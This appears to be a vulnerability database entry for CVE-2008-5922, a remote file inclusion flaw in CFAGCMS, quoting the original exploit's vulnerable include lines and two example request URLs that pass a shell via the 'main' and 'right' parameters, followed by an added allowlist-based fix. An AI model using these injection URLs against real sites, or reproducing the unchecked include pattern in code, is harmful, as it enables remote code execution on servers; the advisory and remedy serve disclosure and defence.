cfagcms 'themes/default/index.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1117030    Vulnerability type: Code injection
Published: 2008-12-14    Updated: 2009-04-04
CVE ID: CVE-2008-5922    CNNVD ID: CNNVD-200901-244
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/7459
https://cxsecurity.com/issue/WLB-2009010176
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-244
|Vulnerability Details
Multiple PHP remote file inclusion vulnerabilities exist in themes/default/index.php in CantFindAGamingCMS (CFAGCMS) 1. A remote attacker can execute arbitrary PHP code via a URL supplied in either the (1) main or (2) right parameter.
|Vulnerability Exploit
Author : BeyazKurt - Bey4zKurt@Gmail.Com

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQİPTAR!
Shall I say something about politics :p
 
FENERBAHÇEE (H)

# milw0rm.com [2008-12-14]
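A defensive counterpart to the two unchecked includes quoted in the exploit above, added here as an example; it is not code from the advisory or from CFAGCMS, and the ALLOWED_FRAGMENTS table and its file names are assumptions.

```php
<?php
// Added example (not CFAGCMS code): replaces the two unchecked includes
// from themes/default/index.php with an allowlist-based fragment loader.
// Vulnerable pattern from the advisory: include($main); include($right);
// With allow_url_include=On a URL in ?main= pulls remote PHP into the page;
// even with it off, local paths and stream wrappers remain includable.

// Fragment names the theme may load. File names are assumed, not taken
// from the real project.
const ALLOWED_FRAGMENTS = [
    'main'  => ['home' => 'main_home.php', 'news' => 'main_news.php'],
    'right' => ['default' => 'right_default.php'],
];

/**
 * Map an untrusted request value to a file inside the theme directory.
 * Returns the absolute path, or null if the value is not on the allowlist
 * or the resolved file is not inside $themeDir.
 */
function resolveFragment(string $slot, $requested, string $themeDir): ?string
{
    if (!isset(ALLOWED_FRAGMENTS[$slot])) {
        return null;
    }
    $table = ALLOWED_FRAGMENTS[$slot];
    // Non-string input (e.g. ?main[]=x) or an unknown key never reaches the filesystem.
    $key = is_string($requested) ? $requested : array_key_first($table);
    if (!isset($table[$key])) {
        return null;
    }
    $base = realpath($themeDir);
    $path = realpath($themeDir . DIRECTORY_SEPARATOR . $table[$key]);
    // realpath() returns false for missing files and for URL wrappers; the
    // prefix check guards against a mis-configured $themeDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$mainFile  = resolveFragment('main',  $_GET['main']  ?? null, __DIR__);
$rightFile = resolveFragment('right', $_GET['right'] ?? null, __DIR__);
if ($mainFile === null || $rightFile === null) {
    http_response_code(400);
    exit('Unknown page fragment');
}
include $mainFile;
include $rightFile;
```

Pair this with allow_url_include=Off in php.ini so that a URL can never be included even if a later code path forgets the check.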
|References

Source: BID
Name: 32817
Link: http://www.securityfocus.com/bid/32817
Source: BUGTRAQ
Name: 20081214 CFAGCMS Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/499213/100/0/threaded
Source: MILW0RM
Name: 7459
Link: http://www.milw0rm.com/exploits/7459
Source: MISC
Link: http://www.bugreport.ir/index_58.htm
Source: SREASON
Name: 4926
Link: http://securityreason.com/securityalert/4926